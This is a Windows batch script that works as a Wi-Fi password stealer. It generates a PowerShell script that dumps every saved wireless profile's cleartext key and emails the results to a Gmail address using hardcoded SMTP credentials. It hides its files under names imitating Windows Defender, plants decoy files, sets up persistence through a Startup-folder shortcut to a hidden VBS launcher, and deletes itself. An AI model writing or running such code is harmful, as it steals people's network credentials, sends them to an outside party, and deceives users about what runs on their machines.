@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
if not exist "%appdata%\Microsoft\Defender" md "%appdata%\Microsoft\Defender" >nul 2>&1
echo (netsh wlan show profiles) ^| Select-String "\:(.+)$" ^| %%{$name=$_.Matches.Groups[1].Value.Trim(); $_} ^| %%{(netsh wlan show profile name="$name" key=clear)}  ^| Select-String "Key Content\W+\:(.+)$" ^| %%{$pass=$_.Matches.Groups[1].Value.Trim(); $_} ^| %%{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} ^| Format-Table -AutoSize ^> "$env:appdata\Microsoft\Defender\WindowsDefenderServices.json" > "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo if ([System.IO.File]::Exists($env:appdata + '\Microsoft\Defender\WindowsDefenderLocal.json')) { >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo fc.exe /a "$env:appdata\Microsoft\Defender\WindowsDefenderLocal.json" "$env:appdata\Microsoft\Defender\WindowsDefenderServices.json" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo if($LASTEXITCODE -ne 1) {exit} >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo } >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $devname = hostname >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $ErrorActionPreference = "Stop" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $MailFrom = "aasenmails@gmail.com" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $MailTo = "aarecmails@gmail.com" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Username = "aasenmails@gmail.com" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Password = "cnfvavuyeevmooff" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $SmtpServer = "smtp.gmail.com" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $SmtpPort = "587" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $MessageSubject = "$devname" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1" 
echo $Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Message.Subject = $MessageSubject >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $file = "$env:appdata\Microsoft\Defender\WindowsDefenderServices.json" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Message.Attachments.Add($file) >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort) >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Smtp.EnableSsl = $true >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Smtp.Credentials = New-Object System.Net.NetworkCredential($Username,$Password) >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo $Smtp.Send($Message) >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo copy "$env:appdata\Microsoft\Defender\WindowsDefenderServices.json" "$env:appdata\Microsoft\Defender\WindowsDefenderLocal.json" >> "%appdata%\Microsoft\Defender\WindowsDefenderScan.ps1"
echo powershell -command "do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping)" > "%appdata%\Microsoft\Defender\WindowsDefenderScanFiles.bat"
echo cd "%%appdata%%\Microsoft\Defender" >> "%appdata%\Microsoft\Defender\WindowsDefenderScanFiles.bat"
echo powershell.exe -ExecutionPolicy Bypass -File "./WindowsDefenderScan.ps1" >> "%appdata%\Microsoft\Defender\WindowsDefenderScanFiles.bat"
echo Set WshShell = CreateObject("WScript.Shell") > "%appdata%\Microsoft\Defender\WindowsDefenderBackgroundServices.vbs"
echo WshShell.Run chr(34) ^& "%%appdata%%\Microsoft\Defender\WindowsDefenderScanFiles.bat" ^& Chr(34), 0 >> "%appdata%\Microsoft\Defender\WindowsDefenderBackgroundServices.vbs"
echo Set WshShell = Nothing >> "%appdata%\Microsoft\Defender\WindowsDefenderBackgroundServices.vbs"
echo %random%%random%%random%%random% > "%appdata%\Microsoft\Defender\WindowsDefenderServices.exe"
echo %random%%random%%random%%random% > "%appdata%\Microsoft\Defender\WindowsDefenderServicesUpdates.dll"
echo %random%%random%%random%%random% > "%appdata%\Microsoft\Defender\WindowsDefenderServicesBackground.dll"
mklink "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Services.lnk" "%appdata%\Microsoft\Defender\WindowsDefenderBackgroundServices.vbs" >nul 2>&1
explorer.exe "%appdata%\Microsoft\Defender\WindowsDefenderBackgroundServices.vbs" >nul 2>&1
del %0 & exit
